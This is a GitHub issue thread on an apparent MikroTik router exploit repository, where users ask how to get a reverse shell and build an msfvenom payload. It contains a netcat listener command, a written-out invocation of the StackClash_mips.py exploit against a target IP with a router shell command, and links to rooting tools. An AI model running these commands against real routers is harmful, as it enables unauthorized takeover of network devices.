-
Notifications
You must be signed in to change notification settings - Fork 217
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
shellcommand #28
Comments
What is this? Pseudo random command? Please read the readme.md before opening issues |
good Read it full
Extract users not thing happen
|
Does reverse shell work? |
$ nc -l -p 1234 |
So you have to root your board and debug it |
how root it Give Me Steps one by one |
Also a coffee? Some links https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0 Then read my pdf to install gdb-server |
Nope |
what shellcommand how build it by KALI LINUX to make it works fine
/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"
Usage: ./StackClash_mips.py IP PORT binary shellcommand
How to get a reverse shell?
where payload to send it to mikrotik and how build it msfvenom we have only binary ???????
can explain
The text was updated successfully, but these errors were encountered: